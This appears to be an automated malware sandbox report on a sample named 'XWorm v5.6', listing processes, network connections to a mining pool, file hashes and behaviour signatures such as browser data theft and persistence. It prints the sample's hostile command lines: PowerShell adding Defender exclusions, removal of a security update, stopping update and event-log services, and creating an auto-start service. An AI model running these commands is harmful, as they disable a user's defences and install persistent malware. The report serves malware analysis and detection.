C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

C:\Windows\system32\sppsvc.exe

C:\Windows\system32\sppsvc.exe

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe"

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T /R

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -Embedding

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "MCDRJPTJ"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "MCDRJPTJ" binpath= "C:\ProgramData\Xworm_Bypass.exe" start= "auto"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "996761466828560643914515844-705127546-8625178171779974019-1939520030-258622825"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "MCDRJPTJ"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "20673050811822855843-1408530781963846042-2819605201571374581-605189935589228638"

C:\ProgramData\Xworm_Bypass.exe

C:\ProgramData\Xworm_Bypass.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-50153917116707656141849574502-387207486-1241545743833005897-994040039-169671173"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-886804050-1680268229-19655389981696649114-7221903401937688591-408691450-928899127"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

dialer.exe

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | eu.ss.btc.com | udp
US | 172.65.222.110:1800 | eu.ss.btc.com | tcp
US | 172.65.222.110:1800 | eu.ss.btc.com | tcp
US | 172.65.222.110:1800 | eu.ss.btc.com | tcp
US | 172.65.222.110:1800 | eu.ss.btc.com | tcp
US | 172.65.222.110:1800 | eu.ss.btc.com | tcp
US | 172.65.222.110:1800 | eu.ss.btc.com | tcp

Files

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe

MD5 d626f885874892781aa6efcc7e0c2a69
SHA1 09f2aeab8f4618f26471261a746bad43bfc917ff
SHA256 df512cabbda87f7630eaa05abce3b84698a00a36d41222a95649f851d3317a1f
SHA512 26695528d81a1cf737d9337f11ca29fcbb7defb0418002e955501d7048c597cf23330be7bc49d33eceead020eb3a3e752d6a6c048ee54aa23c9e1981a520aa63

\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe

MD5 cbf264fda371ab41dccd5e100b59a2cb
SHA1 b0cea8c96cd73b6b085f5ef59ea820b120053754
SHA256 6e330ee9b36579c504acb6485d5be7e9a529713ca70e83fe15cfb36bc76584ed
SHA512 f2af35828d2074c3325eeb8fc0e0694fcbcdd844be630c0fa292276a32f2ec99eb599f9f035ba33204df31f4a368f248c60f35f2cf1df3eb929fe49cf77e6b7e

memory/2952-18-0x000007FEF5453000-0x000007FEF5454000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe

MD5 fdd34dc8e5f2c59153cea0c37646ca8d
SHA1 7e8965a1bbd74f8f999f4dd94a66f9d240b8c7ab
SHA256 99704a3fbd648ef8449232da2768920ac86345939d789d918150fa52d72c1d7e
SHA512 980da4844bc0a2434978d9477b850198eab8fdd8f4272abcd50a2df3ef6a7d73f5d3928a73d747e67a15cf0ec9cd6b285df3bcf0b796536f34fe343701f82007

C:\Users\Admin\AppData\Local\Temp\_MEI10682\python312.dll

MD5 2889fb28cd8f2f32997be99eb81fd7eb
SHA1 adfeb3a08d20e22dde67b60869c93291ca688093
SHA256 435430e3abfde589d8535bc24a4b1d4147a4971dbe59e9377603974c07a1b637
SHA512 aaa33b8178a8831008ea6ad39b05189d55aa228a20a2315e45df6e2ff590c94478cfc76c9adb762689edb021ecdf98df3e7074d8d65c1c477273056b7509f8ee

memory/2952-121-0x0000000000D90000-0x0000000002648000-memory.dmp

memory/2548-124-0x000007FEF37E0000-0x000007FEF3EB9000-memory.dmp

memory/2952-125-0x000000001CE30000-0x000000001D024000-memory.dmp

memory/2952-126-0x000007FEF5450000-0x000007FEF5E3C000-memory.dmp

memory/2952-127-0x000000001D820000-0x000000001E448000-memory.dmp

memory/2548-128-0x000007FEF37E0000-0x000007FEF3EB9000-memory.dmp

memory/1260-136-0x0000000001E80000-0x0000000001E88000-memory.dmp

memory/1260-135-0x000000001B5B0000-0x000000001B892000-memory.dmp

memory/276-138-0x0000000140000000-0x000000014002B000-memory.dmp

memory/1248-228-0x00000000025E0000-0x0000000002604000-memory.dmp

memory/1248-226-0x00000000025E0000-0x0000000002604000-memory.dmp

memory/428-154-0x00000000370E0000-0x00000000370F0000-memory.dmp

memory/428-153-0x000007FEBD570000-0x000007FEBD580000-memory.dmp

memory/1988-381-0x00000000009A0000-0x00000000009A8000-memory.dmp

memory/1988-380-0x000000001A080000-0x000000001A362000-memory.dmp

memory/428-152-0x0000000000CD0000-0x0000000000CFB000-memory.dmp

memory/276-144-0x00000000770A0000-0x0000000077249000-memory.dmp

memory/276-146-0x0000000140000000-0x000000014002B000-memory.dmp

memory/276-145-0x0000000076E80000-0x0000000076F9F000-memory.dmp

memory/276-143-0x0000000140000000-0x000000014002B000-memory.dmp

memory/276-141-0x0000000140000000-0x000000014002B000-memory.dmp

memory/276-140-0x0000000140000000-0x000000014002B000-memory.dmp

memory/276-139-0x0000000140000000-0x000000014002B000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 53b0c097ec11172f0c9adfeda3acf39b
SHA1 a93a21d93754c71768f5a553543ced1054578fd3
SHA256 65e6ccd768afc973580bcfe6969c4dc7e4055dff21333d3e41bc88e2352b44dc
SHA512 125d85649ec095e569a1d3e49dc7cdd8c90a5751ce21863e5635d92e978fdf9a32a5f587dd2bb02ce874b5885bf20e7e89955cd8f1e3c6cbb0cecb28227cf772

memory/2952-581-0x000007FEF5453000-0x000007FEF5454000-memory.dmp

memory/2952-675-0x000007FEF5450000-0x000007FEF5E3C000-memory.dmp

C:\Windows\System32\perfc011.dat

MD5 1f998386566e5f9b7f11cc79254d1820
SHA1 e1da5fe1f305099b94de565d06bc6f36c6794481
SHA256 1665d97fb8786b94745295feb616a30c27af84e8a5e1d25cd1bcaf70723040ea
SHA512 a7c9702dd5833f4d6d27ce293efb9507948a3b05db350fc9909af6a48bd649c7578f856b4d64d87df451d0efbe202c62da7fffcac03b3fe72c7caaea553de75f

C:\Windows\System32\wbem\Performance\WmiApRpl.ini

MD5 46d08e3a55f007c523ac64dce6dcf478
SHA1 62edf88697e98d43f32090a2197bead7e7244245
SHA256 5b15b1fc32713447c3fbc952a0fb02f1fd78c6f9ac69087bdb240625b0282614
SHA512 b1f42e70c0ba866a9ed34eb531dbcbae1a659d7349c1e1a14b18b9e23d8cbd302d8509c6d3a28bc7509dd92e83bcb400201fb5d5a70f613421d81fe649d02e42

C:\Windows\System32\perfh009.dat

MD5 1c678ee06bd02b5d9e4d51c3a4ec2d2b
SHA1 90aa7fdfaaa37fb4f2edfc8efc3994871087dedb
SHA256 2d168ab31836a08d8ca00aab9685f040aac4052a7f10fbbf0c28e9f880a79dd3
SHA512 ec665d7a20f27b2a0fe2475883009c6d34615cc2046d096de447ef57bcac9da0ae842be0556f5736f42d9c1c601fb8629896a2444990e508f7c573165088ab32

C:\Windows\System32\perfh00A.dat

MD5 7d0bac4e796872daa3f6dc82c57f4ca8
SHA1 b4f6bbe08fa8cd0784a94ac442ff937a3d3eea0a
SHA256 ce2ef9fc248965f1408d4b7a1e6db67494ba07a7bbdfa810418b30be66ad5879
SHA512 145a0e8543e0d79fe1a5ce268d710c807834a05da1e948f84d6a1818171cd4ef077ea44ba1fe439b07b095721e0109cbf7e4cfd7b57519ee44d9fd9fe1169a3e

C:\Windows\System32\perfc00A.dat

MD5 540138285295c68de32a419b7d9de687
SHA1 1cf6a2a0f53f0516ff9fe5ac733dbb5a9255ae56
SHA256 33867c52f756f2b0f645f4bd503c65969d73676dcb14e6a6fdb2ffb11c7562eb
SHA512 7c17c10d4b6165aa0c208811dc6d98e2f4e75e3da1cc2313cc7da9d657626beb3e4ec00b07b71376a7c549725d40db20d8952753e70acc86e87a8390e224a64a

C:\Windows\System32\perfh007.dat

MD5 5026297c7c445e7f6f705906a6f57c02
SHA1 4ec3b66d44b0d44ec139bd1475afd100748f9e91
SHA256 506d3bec72805973df3b2e11aba4d074aeb4b26b7335536e79ea1145108817cc
SHA512 5be8e51ecacda465b905df3e38ac114240d8fa6bae5bb17e8e53a87630454b57514ca0abbd8afefd798d450cd4ee89caf4391eeb837ced384260c188482fb48d

C:\Windows\System32\perfc007.dat

MD5 0f3d76321f0a7986b42b25a3aa554f82
SHA1 7036bba62109cc25da5d6a84d22b6edb954987c0
SHA256 dfad62e3372760d303f7337fe290e4cb28e714caadd3c59294b77968d81fe460
SHA512 bb02a3f14d47d233fbda046f61bbf5612ebc6213b156af9c47f56733a03df1bb484d1c3576569eb4499d7b378eb01f4d6e906c36c6f71738482584c2e84b47d0

C:\Windows\System32\perfh011.dat

MD5 54c674d19c0ff72816402f66f6c3d37c
SHA1 2dcc0269545a213648d59dc84916d9ec2d62a138
SHA256 646d4ea2f0670691aa5b998c26626ede7623886ed3ac9bc9679018f85e584bb5
SHA512 4d451e9bef2c451cb9e86c7f4d705be65787c88df5281da94012bfbe5af496718ec3e48099ec3dff1d06fee7133293f10d649866fe59daa7951aebe2e5e67c1f

C:\Windows\System32\perfh010.dat

MD5 4623482c106cf6cc1bac198f31787b65
SHA1 5abb0decf7b42ef5daf7db012a742311932f6dad
SHA256 eceda45aedbf6454b79f010c891bead3844d43189972f6beeb5ccddb13cc0349
SHA512 afecefcec652856dd8b4275f11d75a68a582337b682309c4b61fd26ed7038b92e6b9aa72c1bfc350ce2caf5e357098b54eb1e448a4392960f9f82e01c447669f

C:\Windows\System32\perfc010.dat

MD5 d73172c6cb697755f87cd047c474cf91
SHA1 abc5c7194abe32885a170ca666b7cce8251ac1d6
SHA256 9de801eebbe32699630f74082c9adea15069acd5afb138c9ecd5d4904e3cdc57
SHA512 7c9e4126bed6bc94a211281eed45cee30452519f125b82b143f78da32a3aac72d94d31757e1da22fb2f8a25099ffddec992e2c60987efb9da9b7a17831eafdf6

C:\Windows\System32\perfh00C.dat

MD5 5f684ce126de17a7d4433ed2494c5ca9
SHA1 ce1a30a477daa1bac2ec358ce58731429eafe911
SHA256 2e2ba0c47e71991d646ec380cde47f44318d695e6f3f56ec095955a129af1c2c
SHA512 4d0c2669b5002da14d44c21dc2f521fb37b6b41b61bca7b2a9af7c03f616dda9ca825f79a81d3401af626a90017654f9221a6ccc83010ff73de71967fc2f3f5b

C:\Windows\System32\perfc00C.dat

MD5 ce233fa5dc5adcb87a5185617a0ff6ac
SHA1 2e2747284b1204d3ab08733a29fdbabdf8dc55b9
SHA256 68d4de5e72cfd117151c44dd6ec74cf46fafd6c51357895d3025d7dac570ce31
SHA512 1e9c8e7f12d7c87b4faa0d587a8b374e491cd44f23e13fdb64bde3bc6bf3f2a2d3aba5444a13b199a19737a8170ee8d4ead17a883fbaee66b8b32b35b7577fc2

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-15 10:23

Reported

2024-07-15 10:25

Platform

win10v2004-20240709-en

Max time kernel

18s

Max time network

24s

Command Line

winlogon.exe

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Creates new service(s)

persistence execution

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A

Stops running service(s)

evasion execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bypass_helper.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2228 set thread context of 2868 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe C:\Windows\system32\dialer.exe

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
